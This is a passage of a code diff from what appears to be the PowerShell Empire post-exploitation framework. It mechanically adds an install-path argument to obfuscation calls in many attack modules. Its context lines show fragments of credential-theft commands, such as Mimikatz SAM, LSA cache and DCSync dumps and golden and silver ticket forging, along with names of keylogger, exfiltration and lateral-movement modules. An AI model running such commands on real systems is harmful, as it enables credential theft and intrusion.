str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/file_finder.py b/lib/modules/powershell/collection/file_finder.py index e66d908..8b8f7bf 100644 --- a/lib/modules/powershell/collection/file_finder.py +++ b/lib/modules/powershell/collection/file_finder.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/find_interesting_file.py b/lib/modules/powershell/collection/find_interesting_file.py index 1a68474..6795ee6 100644 --- a/lib/modules/powershell/collection/find_interesting_file.py +++ b/lib/modules/powershell/collection/find_interesting_file.py @@ -127,5 +127,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py index 3039b13..37c8a8e 100644 --- a/lib/modules/powershell/collection/get_indexed_item.py +++ b/lib/modules/powershell/collection/get_indexed_item.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY" scriptEnd += " | fl | Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py index 7f9d007..3f32243 100644 --- a/lib/modules/powershell/collection/get_sql_column_sample_data.py +++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py @@ -114,6 +114,6 @@ class Module: if no_defaults: scriptEnd += " -NoDefaults " if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py index bdf45f5..7079566 100644 --- a/lib/modules/powershell/collection/get_sql_query.py +++ b/lib/modules/powershell/collection/get_sql_query.py @@ -89,6 +89,6 @@ class Module: scriptEnd += " -Instance "+instance scriptEnd += " -Query "+"\'"+query+"\'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/inveigh.py b/lib/modules/powershell/collection/inveigh.py index 828d8ef..bf3425c 100644 --- a/lib/modules/powershell/collection/inveigh.py +++ b/lib/modules/powershell/collection/inveigh.py @@ -232,6 +232,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/keylogger.py b/lib/modules/powershell/collection/keylogger.py index 2318eb6..0a5d619 100644 --- a/lib/modules/powershell/collection/keylogger.py +++ b/lib/modules/powershell/collection/keylogger.py @@ -77,6 +77,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/minidump.py b/lib/modules/powershell/collection/minidump.py index 0b74e07..ea99308 100644 --- a/lib/modules/powershell/collection/minidump.py +++ b/lib/modules/powershell/collection/minidump.py @@ -98,6 +98,6 @@ class Module: if option != "Agent" and option != "ProcessName" and option != "ProcessId": scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/netripper.py b/lib/modules/powershell/collection/netripper.py index 0be077d..304b1fa 100644 --- a/lib/modules/powershell/collection/netripper.py +++ b/lib/modules/powershell/collection/netripper.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ";'Invoke-NetRipper completed.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ninjacopy.py b/lib/modules/powershell/collection/ninjacopy.py index 8f9aa35..a056072 100644 --- a/lib/modules/powershell/collection/ninjacopy.py +++ b/lib/modules/powershell/collection/ninjacopy.py @@ -103,6 +103,6 @@ class Module: scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/packet_capture.py b/lib/modules/powershell/collection/packet_capture.py index ae26455..8c367c0 100644 --- a/lib/modules/powershell/collection/packet_capture.py +++ b/lib/modules/powershell/collection/packet_capture.py @@ -90,5 +90,5 @@ class Module: if persistent != "": script += " persistent=yes" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/prompt.py b/lib/modules/powershell/collection/prompt.py index b0b00da..4339abd 100644 --- a/lib/modules/powershell/collection/prompt.py +++ b/lib/modules/powershell/collection/prompt.py @@ -120,5 +120,5 @@ Invoke-Prompt """ else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/screenshot.py b/lib/modules/powershell/collection/screenshot.py index 091a2d2..b5a4fc2 100644 --- a/lib/modules/powershell/collection/screenshot.py +++ b/lib/modules/powershell/collection/screenshot.py @@ -115,5 +115,5 @@ Get-Screenshot""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py index a348ea6..282050f 100644 --- a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py @@ -118,6 +118,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/find_keepass_config.py b/lib/modules/powershell/collection/vaults/find_keepass_config.py index b4ef71a..5e63397 100644 --- a/lib/modules/powershell/collection/vaults/find_keepass_config.py +++ b/lib/modules/powershell/collection/vaults/find_keepass_config.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py index b0a0935..a937b0b 100644 --- a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/keethief.py b/lib/modules/powershell/collection/vaults/keethief.py index 836c398..9122971 100644 --- a/lib/modules/powershell/collection/vaults/keethief.py +++ b/lib/modules/powershell/collection/vaults/keethief.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py index 7cce50d..5de6543 100644 --- a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py @@ -92,6 +92,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/credential_injection.py b/lib/modules/powershell/credentials/credential_injection.py index 30b3638..bf541e4 100644 --- a/lib/modules/powershell/credentials/credential_injection.py +++ b/lib/modules/powershell/credentials/credential_injection.py @@ -151,6 +151,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/enum_cred_store.py b/lib/modules/powershell/credentials/enum_cred_store.py index c04fa82..7e5afc8 100644 --- a/lib/modules/powershell/credentials/enum_cred_store.py +++ b/lib/modules/powershell/credentials/enum_cred_store.py @@ -54,6 +54,6 @@ class Module: scriptEnd = "\n%s" %(scriptCmd) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/invoke_kerberoast.py b/lib/modules/powershell/credentials/invoke_kerberoast.py index ec8e320..a94ef2a 100644 --- a/lib/modules/powershell/credentials/invoke_kerberoast.py +++ b/lib/modules/powershell/credentials/invoke_kerberoast.py @@ -124,6 +124,6 @@ class Module: scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/cache.py b/lib/modules/powershell/credentials/mimikatz/cache.py index 64f2a8d..90b0986 100644 --- a/lib/modules/powershell/credentials/mimikatz/cache.py +++ b/lib/modules/powershell/credentials/mimikatz/cache.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/certs.py b/lib/modules/powershell/credentials/mimikatz/certs.py index bc6cfa7..9bb7f87 100644 --- a/lib/modules/powershell/credentials/mimikatz/certs.py +++ b/lib/modules/powershell/credentials/mimikatz/certs.py @@ -73,6 +73,6 @@ class Module: # add in the cert dumping command scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """ if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/command.py b/lib/modules/powershell/credentials/mimikatz/command.py index 6fe1eaa..c5d8ab1 100644 --- a/lib/modules/powershell/credentials/mimikatz/command.py +++ b/lib/modules/powershell/credentials/mimikatz/command.py @@ -79,6 +79,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync.py b/lib/modules/powershell/credentials/mimikatz/dcsync.py index c5c9305..4f725b9 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync.py @@ -100,6 +100,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py index e622667..cd46e70 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py @@ -109,6 +109,6 @@ class Module: scriptEnd += "| Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py index eec8576..33d9ea7 100644 --- a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py +++ b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py @@ -72,6 +72,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py index 4370568..3a9da38 100644 --- a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py @@ -150,6 +150,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py index 9bcc167..b8f0d6e 100644 --- a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py +++ b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py @@ -78,6 +78,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/lsadump.py b/lib/modules/powershell/credentials/mimikatz/lsadump.py index 94692fb..6fab658 100644 --- a/lib/modules/powershell/credentials/mimikatz/lsadump.py +++ b/lib/modules/powershell/credentials/mimikatz/lsadump.py @@ -86,6 +86,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/mimitokens.py b/lib/modules/powershell/credentials/mimikatz/mimitokens.py index 23020b4..afa5f63 100644 --- a/lib/modules/powershell/credentials/mimikatz/mimitokens.py +++ b/lib/modules/powershell/credentials/mimikatz/mimitokens.py @@ -137,6 +137,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/pth.py b/lib/modules/powershell/credentials/mimikatz/pth.py index 423969f..6da1a65 100644 --- a/lib/modules/powershell/credentials/mimikatz/pth.py +++ b/lib/modules/powershell/credentials/mimikatz/pth.py @@ -126,6 +126,6 @@ class Module: scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/purge.py b/lib/modules/powershell/credentials/mimikatz/purge.py index edac4ea..834d804 100644 --- a/lib/modules/powershell/credentials/mimikatz/purge.py +++ b/lib/modules/powershell/credentials/mimikatz/purge.py @@ -74,6 +74,6 @@ class Module: # set the purge command scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/sam.py b/lib/modules/powershell/credentials/mimikatz/sam.py index 2d229fb..4672a4c 100644 --- a/lib/modules/powershell/credentials/mimikatz/sam.py +++ b/lib/modules/powershell/credentials/mimikatz/sam.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py index 47187f9..0deb85c 100644 --- a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py @@ -162,6 +162,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/trust_keys.py b/lib/modules/powershell/credentials/mimikatz/trust_keys.py index c216a2a..720cf4e 100644 --- a/lib/modules/powershell/credentials/mimikatz/trust_keys.py +++ b/lib/modules/powershell/credentials/mimikatz/trust_keys.py @@ -80,6 +80,6 @@ class Module: else: scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/powerdump.py b/lib/modules/powershell/credentials/powerdump.py index 2abe750..caba57a 100644 --- a/lib/modules/powershell/credentials/powerdump.py +++ b/lib/modules/powershell/credentials/powerdump.py @@ -70,6 +70,6 @@ class Module: scriptEnd = "Invoke-PowerDump" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py index c7acc1b..ee707d1 100644 --- a/lib/modules/powershell/credentials/sessiongopher.py +++ b/lib/modules/powershell/credentials/sessiongopher.py @@ -136,6 +136,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/tokens.py b/lib/modules/powershell/credentials/tokens.py index f79785f..06761f3 100644 --- a/lib/modules/powershell/credentials/tokens.py +++ b/lib/modules/powershell/credentials/tokens.py @@ -155,6 +155,6 @@ class Module: if self.options['RevToSelf']['Value'].lower() != "true": scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/vault_credential.py b/lib/modules/powershell/credentials/vault_credential.py index ab983b6..07623da 100644 --- a/lib/modules/powershell/credentials/vault_credential.py +++ b/lib/modules/powershell/credentials/vault_credential.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Get-VaultCredential" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exfiltration/egresscheck.py b/lib/modules/powershell/exfiltration/egresscheck.py index 02d56e5..902c19d 100644 --- a/lib/modules/powershell/exfiltration/egresscheck.py +++ b/lib/modules/powershell/exfiltration/egresscheck.py @@ -119,6 +119,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exfiltration/exfil_dropbox.py b/lib/modules/powershell/exfiltration/exfil_dropbox.py index a6b70b0..c1e8482 100644 --- a/lib/modules/powershell/exfiltration/exfil_dropbox.py +++ b/lib/modules/powershell/exfiltration/exfil_dropbox.py @@ -84,7 +84,7 @@ class Module: if option in self.options: self.options[option]['Value'] = value - def generate(self): + def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-DropboxUpload { @@ -137,5 +137,5 @@ Invoke-DropboxUpload """ script += " -" + str(option) else: script += " -" + str(option) + " " + str(values['Value']) - + return script diff --git a/lib/modules/powershell/exploitation/exploit_jboss.py b/lib/modules/powershell/exploitation/exploit_jboss.py index 3cf9645..5fe2b02 100644 --- a/lib/modules/powershell/exploitation/exploit_jboss.py +++ b/lib/modules/powershell/exploitation/exploit_jboss.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exploitation/exploit_jenkins.py b/lib/modules/powershell/exploitation/exploit_jenkins.py index d811188..9d97fd5 100644 --- a/lib/modules/powershell/exploitation/exploit_jenkins.py +++ b/lib/modules/powershell/exploitation/exploit_jenkins.py @@ -95,6 +95,6 @@ class Module: scriptEnd += " -Cmd " + command if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/inveigh_relay.py b/lib/modules/powershell/lateral_movement/inveigh_relay.py index 396aa44..93c4982 100644 --- a/lib/modules/powershell/lateral_movement/inveigh_relay.py +++ b/lib/modules/powershell/lateral_movement/inveigh_relay.py @@ -193,6 +193,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py index ba766c3..76b28d7 100644 --- a/lib/modules/powershell/lateral_movement/invoke_dcom.py +++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py @@ -131,6 +131,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py index cdafed5..519124d 100644 --- a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py +++ b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py @@ -185,6 +185,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psexec.py b/lib/modules/powershell/lateral_movement/invoke_psexec.py index ca5fb57..c8f81c1 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psexec.py +++ b/lib/modules/powershell/lateral_movement/invoke_psexec.py @@ -146,6 +146,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psremoting.py b/lib/modules/powershell/lateral_movement/invoke_psremoting.py index e238d20..2f7879b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py +++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py @@ -136,5 